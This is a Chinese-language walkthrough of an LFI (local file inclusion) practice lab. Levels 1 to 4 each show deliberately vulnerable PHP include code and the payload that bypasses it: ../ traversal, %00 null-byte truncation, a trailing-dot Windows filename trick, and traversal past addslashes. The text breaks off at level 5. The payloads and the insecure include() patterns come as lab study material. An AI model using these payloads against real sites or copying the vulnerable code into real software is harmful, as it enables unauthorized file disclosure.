目录
Lfi-Labs
说明
该环境为phpstudy搭建,在网站根目录下存在phpinfo.php;以此为例。
LFI-1
源码:
<?php
include($_GET["page"]);
?>
payload:
?page=phpinfo.php
发现并没用成功,使用 ../
返回上一级目录
LFI-2
源码:
<?php
include("includes/".$_GET['library'].".php");
?>
这里给输入的文件包含变量都添加了.php
后缀。
例:输入phpinfo.php,会变成phpinfo.php.php;这个文件显然不存在。
这里采用%00截断。
payload:
?library=../../phpinfo.php%00
使用%00截断注意的问题:
(1)php版本小于5.3.4。
(2)php的magic_quotes_gpc为OFF状态。
如果两者都满足,还不成功,可以使用burpsuite抓包重放:
但是,我这里还是不行,裂开。
LFI-3
源码:
<?php
if (substr($_GET['file'], -4, 4) != '.php')
echo file_get_contents($_GET['file']);
else
echo 'You are not allowed to see source files!'."\n";
?>
这里审计一下,输入参数的最后四位不能是.php
。
这里利用Windows环境下的特性:在设置文件后缀名时,如果使用后缀名中包含 .
会自动省略。
所以,payload:
?file=../../phpinfo.php.
LFI-4
源码:
<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>
使用addslashes()函数对参数进行了过滤:
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:
单引号(’)
双引号(")
反斜杠(\)
NULL
但是这道题会在末尾自动添加.php的后缀。
payload:
?class=../../../../../phpinfo
LFI-5
源码:
<?php
$file = str_replace('../', '', $_GET['file']);
if